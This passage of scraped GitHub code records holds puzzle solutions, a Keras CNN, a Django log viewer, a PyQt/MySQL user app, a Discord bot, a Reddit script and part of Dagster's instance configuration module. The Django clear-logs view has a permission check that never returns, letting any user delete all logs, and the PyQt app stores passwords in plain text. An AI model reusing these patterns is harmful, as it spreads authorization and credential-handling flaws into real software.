\"0\"\n epsilon_string = epsilon_string + \"1\"\n\n gamma = int(gamma_string, base=2)\n epsilon = int(epsilon_string, base=2)\n\n return gamma * epsilon\n\n\ndef filtermagic(numbers, use_most_common, bit=0):\n assert len(numbers) != 0\n if len(numbers) == 1:\n return numbers[0]\n\n ones_count = 0\n for number in numbers:\n ones_count += int(number[bit])\n\n most_common = 1 if ones_count >= (len(numbers) / 2) else 0\n value = most_common if use_most_common else (most_common + 1) % 2\n value = str(value)\n\n filtered = [n for n in numbers if n[bit] == value]\n return filtermagic(filtered, use_most_common, bit=bit + 1)\n\n\ndef part_2(input):\n oxygen = int(filtermagic(input, True), base=2)\n co2 = int(filtermagic(input, False), base=2)\n return oxygen * co2\n\n\nif __name__ == \"__main__\":\n input = get_input()\n\n part_1 = part_1(input)\n print(f\"Puzzle Part 1: {part_1}\")\n\n part_2 = part_2(input)\n print(f\"Puzzle Part 2: {part_2}\")\n","repo_name":"promarcel/advent-of-code-2021","sub_path":"03/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38029478154","text":"from __future__ import print_function, division\nfrom builtins import range\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, Dropout, BatchNormalization\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# helper\ndef y2indicator(Y):\n N = len(Y)\n K = len(set(Y))\n I = np.zeros((N, K))\n I[np.arange(N), Y] = 1\n return I\n\ndata = pd.read_csv('C:/Python/fashion_mnist/fashion-mnist_train.csv')\ndata = data.as_matrix()\nnp.random.shuffle(data)\n\nX = data[:, 1:].reshape(-1, 28, 28, 1) / 255.0\nY = data[:, 0].astype(np.int32)\n\n# get shapes\n# N = len(Y)\nK = len(set(Y))\n\nY = y2indicator(Y)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(input_shape=(28, 28, 1), filters=32, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Conv2D(filters=64, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Conv2D(filters=128, kernel_size=(3, 3)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D())\n\nmodel.add(Flatten())\nmodel.add(Dense(units=300))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(units=K))\nmodel.add(Activation('softmax'))\n\nmodel.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n)\n\nmodel.summary()\n\nr = model.fit(X, Y, validation_split=0.33, epochs=15, batch_size=32)\nprint('Returned:', r)\nprint(r.history.keys())\n\nplt.plot(r.history['loss'], label='loss')\nplt.plot(r.history['val_loss'], label='val_loss')\nplt.legend()\nplt.show()\n\nplt.plot(r.history['accuracy'], label='acc')\nplt.plot(r.history['val_accuracy'], label='val_acc')\nplt.legend()\nplt.show()","repo_name":"philgineer/Deeplearning_projects","sub_path":"advanced_computer_vision/fashion_mnist_cnn.py","file_name":"fashion_mnist_cnn.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40803726372","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom syslogs.models import Log\n\n\ndef ops_list(request):\n return render(request, 'syslogs/ops_list.html')\n\n\ndef get_ops_list(request):\n if request.user.is_superuser:\n logs = Log.objects.all().order_by('-id')\n else:\n user = request.user.username\n logs = Log.objects.filter(user=user).order_by('-id')\n data = []\n if logs:\n data = [log.to_dict() for log in logs]\n return JsonResponse({'data': data})\n\n\ndef get_log_clear(request):\n if not request.user.is_superuser:\n JsonResponse({'result': False, 'message': 'Permission denied'})\n try:\n Log.objects.all().delete()\n return JsonResponse({'result': True})\n except:\n return JsonResponse({'result': False})","repo_name":"dtlisir/dwm","sub_path":"syslogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7053937209","text":"# Problem No.: 1541\n# Solver: Jinmin Goh\n# Date: 20200413\n# URL: https://www.acmicpc.net/problem/1541\n\nimport sys\n\ndef main():\n string = input()\n temp = \"\"\n nums = []\n ops = []\n for i in string:\n if i not in [\"+\", \"-\"]:\n temp += i\n else:\n nums.append(int(temp))\n ops.append(i)\n temp = \"\"\n nums.append(int(temp))\n #print(nums, ops)\n ans = nums.pop(0)\n while ops:\n if ops[0] == \"-\":\n break\n else:\n ans += nums.pop(0)\n ops.pop(0)\n temp = 0\n while ops:\n if ops[0] == \"-\":\n ops.pop(0)\n temp += nums.pop(0)\n while ops and ops[0] != \"-\":\n temp += nums.pop(0)\n ops.pop(0)\n ans -= temp\n temp = 0\n print(ans)\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/01541/01541.py","file_name":"01541.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32873162421","text":"class Solution(object):\n \"\"\"\n一只青蛙一次可以跳上1级台阶,也可以跳上2级台阶。求该青蛙跳上一个 n 级的台阶总共有多少种跳法。\n答案需要取模 1e9+7(1000000007),如计算初始结果为:1000000008,请返回 1。\n输入:n = 2 输出:2\n输入:n = 7 输出:21\n0 <= n <= 100\n链接:https://leetcode-cn.com/problems/qing-wa-tiao-tai-jie-wen-ti-lcof\n \"\"\"\n def numWays(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n # opt = [1] * (n + 1)\n # for i in range(2, n + 1):\n # opt[i] = opt[i - 1] + opt[i - 2]\n # return opt[n] % 1000000007\n pre, cur = 1, 1\n for i in range(2, n + 1):\n pre, cur = cur, (pre + cur) % 1000000007\n return cur\n\n\ndef main():\n n = 7\n test = Solution()\n ret = test.numWays(n)\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jackyzzk/Coding-Interviews-2","sub_path":"剑指offer-面试题10- II. 青蛙跳台阶问题.py","file_name":"剑指offer-面试题10- II. 青蛙跳台阶问题.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11018722897","text":"#Exercise 1. Enter your name and receive a salutation.\nnombre = input(\"What should I call you? \")\nprint(\"Hello \" + nombre + \".\")\n\n#Exercise 2. Energetic and informative salutation.\nnOMBRE = input(\"TELL ME YOUR NAME AGAIN! \")\nprint(\"HELLO {}! YOUR NAME HAS {} LETTER(S)!\".format(nOMBRE.upper(), len(nOMBRE)))\n\n#Exercise 3. Make a madlib that turns into a horrible limerick\nprint(\"Let's do a madlib!\")\ndestination = input(\"Give me a location: \")\nadjective = input(\"Give me an adjective: \")\nbodyPart = input(\"Give me a body part: \")\njob = input(\"Give me an occupation: \")\n\nprint(\"Okay here we go:\")\nprint(\"There once was a dude from {0},\\nWho always wore {1} clothing,\\nBut one day he fell,\\nAnd lost his {2},\\nNow he's a {3} for life!\\n\".format(destination, adjective, bodyPart, job))\n\nprint(\"...That was terrible.\")\n\n#Exercise 4. Input number to get corresponding day of the week.\nday = int(input('Day (0-6)? '))\ndaysOfWeek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\nprint(\"That would be {}\".format(daysOfWeek[day]))\n\n#Exercise 5. Input number to determine if the corresponding day is for work or sleep.\nday = int(input('Day (0-6)? '))\ndaysOfWeek = [\"Sleep in.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Go to work.\", \"Sleep in.\"]\nprint(daysOfWeek[day])\n\n#Exercise 6. Convert C to F degrees.\ntemp = round(int(input(\"Current temp in C? \")), 2)\nprint(\"That equals {} degrees F.\".format((temp * 1.8 + 32)))\n\n#Exercise 7. Calculate tip based on billing amount and service rating.\ntotalAmt = float(input(\"How much did you spend? \"))\nrating = input(\"Quality of service: Good, fair, or bad? \").lower()\nfeedback = False\nwhile (feedback == False):\n if rating == \"good\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.20, 2)))\n feedback = True\n elif rating == \"fair\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.15, 2)))\n feedback = True\n elif rating == \"bad\":\n print(\"Tip amount is ${0:.2f}.\".format(round(totalAmt * 0.10, 2)))\n feedback = True\n else:\n rating = input(\"Invalid rating. Please enter 'good,' 'fair,' or 'bad.' >> \").lower()\n \n#Exercise 8. Calculate the bill portion for multiple people.\ntotalAmt = float(input(\"How much did you spend? \"))\nrating = input(\"Quality of service: Good, fair, or bad? \").lower()\nsplitTip = int(input(\"Split how many ways? \"))\nfeedback = False\nwhile (feedback == False):\n if rating == \"good\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.20) / splitTip), 2)))\n feedback = True\n elif rating == \"fair\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.15) / splitTip), 2)))\n feedback = True\n elif rating == \"bad\":\n print(\"Tip amount is ${0:.2f}.\".format(round(((totalAmt * 0.10) / splitTip), 2)))\n feedback = True\n else:\n rating = input(\"Invalid rating. Please enter 'good,' 'fair,' or 'bad.' >> \").lower()\n \n#Exercise 9. Use a loop to print numbers 1 - 10.\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\n#Exercise 10. Give out 'coins' and keep a tally.\nprint(\"You have 0 coins. Would you like one?\")\ncoins = 0\ngreed = input(\"Y/N >> \").upper()\nwhile greed == \"Y\" or greed == \"YES\":\n coins += 1\n print(\"You now have {} coins. Would you like another?\".format(coins))\n greed = input(\"Y/N >> \").upper()\nprint(\"Okay, I guess {} coins is good enough.\".format(coins))\n ","repo_name":"jessicapolansky/Class-Python-exercise","sub_path":"Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32353691140","text":"from PyQt5 import uic, QtWidgets\r\nimport mysql.connector\r\n\r\n\r\nbanco = mysql.connector.connect(\r\n user='user',\r\n database='funcionario',\r\n passwd='password',\r\n port='3306'\r\n)\r\n\r\n\r\ndef cadastrarUsuario():\r\n cadastroUsuarioView.show()\r\n cadastroUsuarioView.pushButton.clicked.connect(salvarUsuario)\r\n cadastroUsuarioView.pushButton_2.clicked.connect(exibirUsuario)\r\n\r\n\r\ndef salvarUsuario():\r\n linhaUm = cadastroUsuarioView.lineEdit.text()\r\n linhaDois = cadastroUsuarioView.lineEdit_2.text()\r\n cursor = banco.cursor()\r\n comandoSql = f'insert into usuario (nome, senha) values(%s, %s)'\r\n dados = (str(linhaUm), str(linhaDois))\r\n cursor.execute(comandoSql, dados)\r\n banco.commit()\r\n\r\n\r\ndef exibirUsuario():\r\n exibirUsuarioView.show()\r\n cursor = banco.cursor()\r\n comandoSql = f'select * from usuario'\r\n cursor.execute(comandoSql)\r\n dados_lidos = cursor.fetchall()\r\n\r\n exibirUsuarioView.tableWidget.setRowCount(len(dados_lidos))\r\n exibirUsuarioView.tableWidget.setColumnCount(3)\r\n\r\n for i in range(0, len(dados_lidos)):\r\n for j in range(0,3):\r\n exibirUsuarioView.tableWidget.setItem(i,j, QtWidgets.QTableWidgetItem(str(dados_lidos[i][j])))\r\n\r\n\r\ndef cadastrarProduto():\r\n cadastroProdutoView.show()\r\n cadastroProdutoView.pushButton.clicked.connect(salvarProduto)\r\n\r\n\r\ndef salvarProduto():\r\n produto = cadastroProdutoView.lineEdit.text()\r\n qtd = cadastroProdutoView.lineEdit_2.text()\r\n descricao = cadastroProdutoView.lineEdit_3.text()\r\n preco = cadastroProdutoView.lineEdit_4.text()\r\n\r\n\r\n cursor = banco.cursor()\r\n comandoSql = f'insert into produto (chave, descricao, qtd, preco) values(%s, %s, %s, %s)'\r\n dados = (str(produto), str(descricao), int(qtd), float(preco))\r\n cursor.execute(comandoSql, dados)\r\n banco.commit()\r\n\r\n cadastroProdutoView.show()\r\n\r\n\r\n#Inicio\r\n#Gerando a aplicacao\r\napp = QtWidgets.QApplication([])\r\n\r\n#Carregar o Arquivo .ui\r\ntelaInicial = uic.loadUi('View/TelaInicial.ui')\r\ncadastroUsuarioView = uic.loadUi('View/CadastroUsuario.ui')\r\ncadastroProdutoView = uic.loadUi('View/CadastroProduto.ui')\r\nexibirUsuarioView = uic.loadUi('View/ExibirUsuario.ui')\r\ntelaInicial.pushButton.clicked.connect(cadastrarUsuario)\r\ntelaInicial.pushButton_2.clicked.connect(cadastrarProduto)\r\n\r\n#Exibir Minha Tela\r\ntelaInicial.show()\r\napp.exec()\r\n","repo_name":"antenoradjafre/InfinitySchool","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74315976487","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\n\n\nclass Bot(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n await self.bot.change_presence(\n status=discord.Status.online,\n activity=discord.Game(f\"Extending your links!\"))\n print('This bot is online!')\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(Bot(bot))","repo_name":"CygnusX-26/Link-Extender","sub_path":"bot/cogs/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73440924009","text":"#!/usr/bin/python3\n\"\"\"\nqueries the Reddit API and prints the titles\nof the first 10 hot posts listed for a given subreddit\n\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"\n print the titles of the 10 hot posts\n \"\"\"\n\n url = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n headers = {\n 'user-agent': 'my user agent 1.0',\n 'content-type': 'application/json'\n }\n r = requests.get(url, allow_redirects=False, headers=headers)\n if r.status_code != requests.codes.ok:\n print('None')\n else:\n listing = r.json().get('data').get('children')\n return ([print(\n post.get('data').get('title')) for post in listing[:10]])\n","repo_name":"leobyeon/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40727674698","text":"import sys\n\ndef draw_filesystem(d, indent=0):\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\tprint(' ' * indent + str(key))\n\t\t\tdraw_filesystem(value, indent + 1)\n\t\telse:\n\t\t\tprint(' ' * (indent + 0) + str(key) + \" : \" + str(value))\n\ndef count_sizes(d, indent=0):\n\ttmp = 0\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\ttmp += count_sizes(value, indent+1)\n\t\telse:\n\t\t\ttmp += int(value)\n\td[\"directory_size\"] = tmp\n\treturn tmp\n\ndef build_filesystem(file):\n\tfs = {}#filesystem\n\twd = fs#working directory\n\tpath = []#path of working directory\n\ti = 1\n\tisls = False\n\n\twhile i < len(file):\n\t\tw = file[i].split(' ')\n\t\tif w[0] == '$':\n\t\t\tisls = False\n\t\tif isls:\n\t\t\tif w[0] == \"dir\":\n\t\t\t\twd[w[1]] = {}\n\t\t\telse:\n\t\t\t\twd[w[1]] = w[0]\n\t\tif w[0] == '$':\n\t\t\tif w[1] == \"ls\":\n\t\t\t\tisls = True\n\t\t\telif w[1] == \"cd\":\n\t\t\t\tif w[2] == \"..\":\n\t\t\t\t\tpath.pop()\n\t\t\t\t\twd = fs\n\t\t\t\t\tfor c in path:\n\t\t\t\t\t\twd = wd[c]\n\t\t\t\telse:\n\t\t\t\t\tpath.append(w[2])\n\t\t\t\t\twd = wd[w[2]]\n\t\ti = i + 1\n\treturn fs\n\ndef part1(d, indent=0):\n\ttmp = 0\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\ttmp += part1(value, indent+1)\n\t\tif key == \"directory_size\" and int(value) <= 100000:\n\t\t\ttmp += int(value)\n\treturn tmp\n\ndef part2(d, max, smallest):\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\tsmallest = part2(value, max, smallest)\n\t\tif key == \"directory_size\" and int(value) >= max and int(value) < smallest:\n\t\t\tsmallest = int(value)\n\treturn smallest\n\nf = open(sys.argv[1], 'r')\nfile = f.read().splitlines()\n\nfs = build_filesystem(file)\nfs_size = count_sizes(fs)\ndraw_filesystem(fs)\nprint()\n\nprint(\"part1: \" + str(part1(fs)))\nfreespace = 70000000 - fs_size\nneed_to_free = 30000000 - freespace\nprint(\"part2: \" + str(part2(fs, need_to_free, 9999999999)))\n","repo_name":"rpehkone/adventofcode","sub_path":"2022/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9888072747","text":"import os\nfrom typing import TYPE_CHECKING, Any, Mapping, NamedTuple, Optional, Sequence, Type\n\nimport yaml\n\nimport dagster._check as check\nfrom dagster._serdes import ConfigurableClassData, class_from_code_pointer, whitelist_for_serdes\n\nfrom .config import DAGSTER_CONFIG_YAML_FILENAME, dagster_instance_config\n\nif TYPE_CHECKING:\n from dagster._core.instance import DagsterInstance, DagsterInstanceOverrides\n from dagster._core.launcher.base import RunLauncher\n from dagster._core.run_coordinator.base import RunCoordinator\n from dagster._core.scheduler.scheduler import Scheduler\n from dagster._core.secrets.loader import SecretsLoader\n from dagster._core.storage.base_storage import DagsterStorage\n from dagster._core.storage.compute_log_manager import ComputeLogManager\n from dagster._core.storage.event_log.base import EventLogStorage\n from dagster._core.storage.root import LocalArtifactStorage\n from dagster._core.storage.runs.base import RunStorage\n from dagster._core.storage.schedules.base import ScheduleStorage\n\n\ndef compute_logs_directory(base: str) -> str:\n return os.path.join(base, \"storage\")\n\n\ndef _runs_directory(base: str) -> str:\n return os.path.join(base, \"history\", \"\")\n\n\ndef _event_logs_directory(base: str) -> str:\n return os.path.join(base, \"history\", \"runs\", \"\")\n\n\ndef _schedule_directory(base: str) -> str:\n return os.path.join(base, \"schedules\")\n\n\ndef configurable_class_data(config_field: Mapping[str, Any]) -> ConfigurableClassData:\n return ConfigurableClassData(\n check.str_elem(config_field, \"module\"),\n check.str_elem(config_field, \"class\"),\n yaml.dump(check.opt_dict_elem(config_field, \"config\"), default_flow_style=False),\n )\n\n\ndef configurable_class_data_or_default(\n config_value: Mapping[str, Any], field_name: str, default: Optional[ConfigurableClassData]\n) -> Optional[ConfigurableClassData]:\n return (\n configurable_class_data(config_value[field_name])\n if config_value.get(field_name)\n else default\n )\n\n\ndef configurable_secrets_loader_data(\n config_field: Mapping[str, Any], default: Optional[ConfigurableClassData]\n) -> Optional[ConfigurableClassData]:\n if not config_field:\n return default\n elif \"custom\" in config_field:\n return configurable_class_data(config_field[\"custom\"])\n else:\n return None\n\n\ndef configurable_storage_data(\n config_field: Mapping[str, Any], defaults: Mapping[str, Optional[ConfigurableClassData]]\n) -> Sequence[Optional[ConfigurableClassData]]:\n storage_data: ConfigurableClassData\n run_storage_data: Optional[ConfigurableClassData]\n event_storage_data: Optional[ConfigurableClassData]\n schedule_storage_data: Optional[ConfigurableClassData]\n\n if not config_field:\n storage_data = check.not_none(defaults.get(\"storage\"))\n run_storage_data = check.not_none(defaults.get(\"run_storage\"))\n event_storage_data = check.not_none(defaults.get(\"event_log_storage\"))\n schedule_storage_data = check.not_none(defaults.get(\"schedule_storage\"))\n elif \"postgres\" in config_field:\n config_yaml = yaml.dump(config_field[\"postgres\"], default_flow_style=False)\n storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"DagsterPostgresStorage\",\n config_yaml=config_yaml,\n )\n # for backwards compatibility\n run_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresRunStorage\",\n config_yaml=config_yaml,\n )\n event_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresEventLogStorage\",\n config_yaml=config_yaml,\n )\n schedule_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresScheduleStorage\",\n config_yaml=config_yaml,\n )\n\n elif \"mysql\" in config_field:\n config_yaml = yaml.dump(config_field[\"mysql\"], default_flow_style=False)\n storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"DagsterMySQLStorage\",\n config_yaml=config_yaml,\n )\n # for backwards compatibility\n run_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLRunStorage\",\n config_yaml=config_yaml,\n )\n event_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLEventLogStorage\",\n config_yaml=config_yaml,\n )\n schedule_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLScheduleStorage\",\n config_yaml=config_yaml,\n )\n\n elif \"sqlite\" in config_field:\n base_dir = config_field[\"sqlite\"][\"base_dir\"]\n storage_data = ConfigurableClassData(\n \"dagster._core.storage.sqlite_storage\",\n \"DagsterSqliteStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n )\n\n # Back-compat fo the legacy storage field only works if the base_dir is a string\n # (env var doesn't work since each storage has a different value for the base_dir field)\n if isinstance(base_dir, str):\n run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.runs\",\n \"SqliteRunStorage\",\n yaml.dump({\"base_dir\": _runs_directory(base_dir)}, default_flow_style=False),\n )\n\n event_storage_data = ConfigurableClassData(\n \"dagster._core.storage.event_log\",\n \"SqliteEventLogStorage\",\n yaml.dump({\"base_dir\": _event_logs_directory(base_dir)}, default_flow_style=False),\n )\n\n schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.schedules\",\n \"SqliteScheduleStorage\",\n yaml.dump({\"base_dir\": _schedule_directory(base_dir)}, default_flow_style=False),\n )\n else:\n run_storage_data = None\n event_storage_data = None\n schedule_storage_data = None\n else:\n storage_data = configurable_class_data(config_field[\"custom\"])\n storage_config_yaml = yaml.dump(\n {\n \"module_name\": storage_data.module_name,\n \"class_name\": storage_data.class_name,\n \"config_yaml\": storage_data.config_yaml,\n },\n default_flow_style=False,\n )\n run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyRunStorage\", storage_config_yaml\n )\n event_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyEventLogStorage\", storage_config_yaml\n )\n schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyScheduleStorage\", storage_config_yaml\n )\n\n return [storage_data, run_storage_data, event_storage_data, schedule_storage_data]\n\n\n@whitelist_for_serdes\nclass InstanceRef(\n NamedTuple(\n \"_InstanceRef\",\n [\n (\"local_artifact_storage_data\", ConfigurableClassData),\n (\"compute_logs_data\", ConfigurableClassData),\n (\"scheduler_data\", Optional[ConfigurableClassData]),\n (\"run_coordinator_data\", Optional[ConfigurableClassData]),\n (\"run_launcher_data\", Optional[ConfigurableClassData]),\n (\"settings\", Mapping[str, object]),\n # Required for backwards compatibility, but going forward will be unused by new versions\n # of DagsterInstance, which instead will instead grab the constituent storages from the\n # unified `storage_data`, if it is populated.\n (\"run_storage_data\", Optional[ConfigurableClassData]),\n (\"event_storage_data\", Optional[ConfigurableClassData]),\n (\"schedule_storage_data\", Optional[ConfigurableClassData]),\n (\"custom_instance_class_data\", Optional[ConfigurableClassData]),\n # unified storage field\n (\"storage_data\", Optional[ConfigurableClassData]),\n (\"secrets_loader_data\", Optional[ConfigurableClassData]),\n ],\n )\n):\n \"\"\"Serializable representation of a :py:class:`DagsterInstance`.\n\n Users should not instantiate this class directly.\n \"\"\"\n\n def __new__(\n cls,\n local_artifact_storage_data: ConfigurableClassData,\n compute_logs_data: ConfigurableClassData,\n scheduler_data: Optional[ConfigurableClassData],\n run_coordinator_data: Optional[ConfigurableClassData],\n run_launcher_data: Optional[ConfigurableClassData],\n settings: Mapping[str, object],\n run_storage_data: Optional[ConfigurableClassData],\n event_storage_data: Optional[ConfigurableClassData],\n schedule_storage_data: Optional[ConfigurableClassData],\n custom_instance_class_data: Optional[ConfigurableClassData] = None,\n storage_data: Optional[ConfigurableClassData] = None,\n secrets_loader_data: Optional[ConfigurableClassData] = None,\n ):\n return super(cls, InstanceRef).__new__(\n cls,\n local_artifact_storage_data=check.inst_param(\n local_artifact_storage_data, \"local_artifact_storage_data\", ConfigurableClassData\n ),\n compute_logs_data=check.inst_param(\n compute_logs_data, \"compute_logs_data\", ConfigurableClassData\n ),\n scheduler_data=check.opt_inst_param(\n scheduler_data, \"scheduler_data\", ConfigurableClassData\n ),\n run_coordinator_data=check.opt_inst_param(\n run_coordinator_data, \"run_coordinator_data\", ConfigurableClassData\n ),\n run_launcher_data=check.opt_inst_param(\n run_launcher_data, \"run_launcher_data\", ConfigurableClassData\n ),\n settings=check.opt_mapping_param(settings, \"settings\", key_type=str),\n run_storage_data=check.opt_inst_param(\n run_storage_data, \"run_storage_data\", ConfigurableClassData\n ),\n event_storage_data=check.opt_inst_param(\n event_storage_data, \"event_storage_data\", ConfigurableClassData\n ),\n schedule_storage_data=check.opt_inst_param(\n schedule_storage_data, \"schedule_storage_data\", ConfigurableClassData\n ),\n custom_instance_class_data=check.opt_inst_param(\n custom_instance_class_data,\n \"instance_class\",\n ConfigurableClassData,\n ),\n storage_data=check.opt_inst_param(storage_data, \"storage_data\", ConfigurableClassData),\n secrets_loader_data=check.opt_inst_param(\n secrets_loader_data, \"secrets_loader_data\", ConfigurableClassData\n ),\n )\n\n @staticmethod\n def config_defaults(base_dir: str) -> Mapping[str, Optional[ConfigurableClassData]]:\n default_run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.runs\",\n \"SqliteRunStorage\",\n yaml.dump({\"base_dir\": _runs_directory(base_dir)}, default_flow_style=False),\n )\n default_event_log_storage_data = ConfigurableClassData(\n \"dagster._core.storage.event_log\",\n \"SqliteEventLogStorage\",\n yaml.dump({\"base_dir\": _event_logs_directory(base_dir)}, default_flow_style=False),\n )\n default_schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.schedules\",\n \"SqliteScheduleStorage\",\n yaml.dump({\"base_dir\": _schedule_directory(base_dir)}, default_flow_style=False),\n )\n\n return {\n \"local_artifact_storage\": ConfigurableClassData(\n \"dagster._core.storage.root\",\n \"LocalArtifactStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n ),\n \"storage\": ConfigurableClassData(\n \"dagster._core.storage.sqlite_storage\",\n \"DagsterSqliteStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n ),\n \"compute_logs\": ConfigurableClassData(\n \"dagster._core.storage.local_compute_log_manager\",\n \"LocalComputeLogManager\",\n yaml.dump({\"base_dir\": compute_logs_directory(base_dir)}, default_flow_style=False),\n ),\n \"scheduler\": ConfigurableClassData(\n \"dagster._core.scheduler\",\n \"DagsterDaemonScheduler\",\n yaml.dump({}),\n ),\n \"run_coordinator\": ConfigurableClassData(\n \"dagster._core.run_coordinator\", \"DefaultRunCoordinator\", yaml.dump({})\n ),\n \"run_launcher\": ConfigurableClassData(\n \"dagster\",\n \"DefaultRunLauncher\",\n yaml.dump({}),\n ),\n # For back-compat, the default is actually set in the secrets_loader property above,\n # so that old clients loading new config don't try to load a class that they\n # don't recognize\n \"secrets\": None,\n # LEGACY DEFAULTS\n \"run_storage\": default_run_storage_data,\n \"event_log_storage\": default_event_log_storage_data,\n \"schedule_storage\": default_schedule_storage_data,\n }\n\n @staticmethod\n def from_dir(\n base_dir: str,\n *,\n config_dir: Optional[str] = None,\n config_filename: str = DAGSTER_CONFIG_YAML_FILENAME,\n overrides: Optional[\"DagsterInstanceOverrides\"] = None,\n ) -> \"InstanceRef\":\n if config_dir is None:\n config_dir = base_dir\n\n overrides = check.opt_mapping_param(overrides, \"overrides\")\n config_value, custom_instance_class = dagster_instance_config(\n config_dir, config_filename=config_filename, overrides=overrides\n )\n\n if custom_instance_class:\n config_keys = set(custom_instance_class.config_schema().keys()) # type: ignore # (undefined method)\n custom_instance_class_config = {\n key: val for key, val in config_value.items() if key in config_keys\n }\n custom_instance_class_data = ConfigurableClassData(\n config_value[\"instance_class\"][\"module\"],\n config_value[\"instance_class\"][\"class\"],\n yaml.dump(custom_instance_class_config, default_flow_style=False),\n )\n defaults = custom_instance_class.config_defaults(base_dir) # type: ignore # (undefined method)\n else:\n custom_instance_class_data = None\n defaults = InstanceRef.config_defaults(base_dir)\n\n local_artifact_storage_data = configurable_class_data_or_default(\n config_value, \"local_artifact_storage\", defaults[\"local_artifact_storage\"]\n )\n\n compute_logs_data = configurable_class_data_or_default(\n config_value,\n \"compute_logs\",\n defaults[\"compute_logs\"],\n )\n\n if (\n config_value.get(\"run_storage\")\n or config_value.get(\"event_log_storage\")\n or config_value.get(\"schedule_storage\")\n ):\n # using legacy config, specifying config for each of the constituent storages, make sure\n # to create a composite storage\n run_storage_data = configurable_class_data_or_default(\n config_value, \"run_storage\", defaults[\"run_storage\"]\n )\n event_storage_data = configurable_class_data_or_default(\n 